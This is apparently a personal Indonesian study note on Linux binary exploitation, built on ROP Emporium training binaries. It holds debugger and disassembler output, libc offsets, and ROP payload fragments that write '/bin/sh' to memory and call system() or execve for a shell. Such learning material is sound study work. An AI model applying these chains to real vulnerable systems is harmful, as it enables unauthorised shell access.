Artikel ini merupakan ringkasan selama 2 minggu ini mencoba untuk mempelajari linux binary exploitation. Sebagai catatan pribadi yang mungkin berguna dikemudian hari. Seperti artikel sebelumnya, saya hanya mencoba apa yang dituliskan oleh orang lain, untuk memahami sedikit demi sedikit tentang linux binary exploitation. Berikut ini beberapa referensi yang dipakai dalam pembelajaran:
https://github.com/nnamon/linux-exploitation-course
https://ropemporium.com/guide.html
https://github.com/abatchy17/ROP-Emporium
Linux Binary Protection
https://github.com/nnamon/linux-exploitation-course/blob/master/lessons/5_protections/lessonplan.md
# gdb ./write432 gdb-peda$ pattern create 200 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3A\ AIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAm\ ARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA' gdb-peda$ pattern offset 0x41414641 1094796865 found at offset: 44 gdb-peda$
$ ldd callme linux-vdso.so.1 (0x00007fff306bd000) libcallme.so => ./libcallme.so (0x00007fd3c2179000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd3c1fa1000) /lib64/ld-linux-x86-64.so.2 (0x00007fd3c237d000)
https://github.com/niklasb/libc-database $./add /lib/i386-linux-gnu/libc.so.6 $./dump local-0490256d1290b4c4fb59f37f9d3d87226d6500e6 offset___libc_start_main_ret = 0x199a1 offset_system = 0x0003d870 offset_dup2 = 0x000e6f60 offset_read = 0x000e6470 offset_write = 0x000e6540 offset_str_bin_sh = 0x17c968
# r2 -d write432 [0xf7f7d250]> aaa [0xf7f7d250]> afl 0x080483c0 3 35 sym._init 0x08048400 1 6 sym.imp.printf 0x08048410 1 6 sym.imp.fgets 0x08048420 1 6 sym.imp.puts 0x08048430 1 6 sym.imp.system 0x08048440 1 6 sym.imp.__libc_start_main 0x08048450 1 6 sym.imp.setvbuf 0x08048460 1 6 sym.imp.memset 0x08048470 1 6 sub.__gmon_start_470 0x08048480 1 33 entry0 0x080484b0 1 4 sym.__x86.get_pc_thunk.bx 0x080484c0 4 43 sym.deregister_tm_clones 0x080484f0 4 53 sym.register_tm_clones 0x08048530 3 30 sym.__do_global_dtors_aux 0x08048550 4 43 -> 40 entry1.init 0x0804857b 1 123 sym.main 0x080485f6 1 86 sym.pwnme 0x0804864c 1 25 sym.usefulFunction 0x08048680 4 93 sym.__libc_csu_init 0x080486e0 1 2 sym.__libc_csu_fini 0x080486e4 1 20 sym._fini
# objdump -d write432 -j .plt 08048430: 8048430: ff 25 18 a0 04 08 jmp *0x804a018 8048436: 68 18 00 00 00 push $0x18 804843b: e9 b0 ff ff ff jmp 80483f0 <.plt>
# readelf --relocs write432 Relocation section '.rel.dyn' at offset 0x368 contains 4 entries: Offset Info Type Sym.Value Sym. Name 08049ffc 00000506 R_386_GLOB_DAT 00000000 __gmon_start__ 0804a040 00000a05 R_386_COPY 0804a040 stderr@GLIBC_2.0 0804a060 00000c05 R_386_COPY 0804a060 stdin@GLIBC_2.0 0804a064 00000905 R_386_COPY 0804a064 stdout@GLIBC_2.0 Relocation section '.rel.plt' at offset 0x388 contains 7 entries: Offset Info Type Sym.Value Sym. Name 0804a00c 00000107 R_386_JUMP_SLOT 00000000 printf@GLIBC_2.0 0804a010 00000207 R_386_JUMP_SLOT 00000000 fgets@GLIBC_2.0 0804a014 00000307 R_386_JUMP_SLOT 00000000 puts@GLIBC_2.0 0804a018 00000407 R_386_JUMP_SLOT 00000000 system@GLIBC_2.0 0804a01c 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0 0804a020 00000707 R_386_JUMP_SLOT 00000000 setvbuf@GLIBC_2.0 0804a024 00000807 R_386_JUMP_SLOT 00000000 memset@GLIBC_2.0
# rabin2 -S write432 23 0x00000ffc 4 0x08049ffc 4 -rw- .got 24 0x00001000 40 0x0804a000 40 -rw- .got.plt 25 0x00001028 8 0x0804a028 8 -rw- .data 26 0x00001030 0 0x0804a040 44 -rw- .bss
32bit #write /bin to ebp 4byte payload += p32(pop_edi_ebp) payload += p32(data_segment) payload += '/bin' payload += p32(mov_edi_ebp)
64bit #write 8byte /bin/sh\x00 payload += p64(pop_r14_r15) payload += p64(data_segment) payload += '/bin//sh' payload += p64(mov_r14_r15)
32bit system() ROP #call system payload += p32(system_plt) payload += p32(0xdeadbeef) payload += p32(data_segment)
64bit system() ROP #call system payload += p64(pop_rdi) payload += p64(data_segment) payload += p64(system_plt)
ROPgadget / ropper $ ROPgadget --binary 1_staticnx --ropchain $ ropper --file ../Downloads/1_staticnx --chain execve --badbytes 000a0d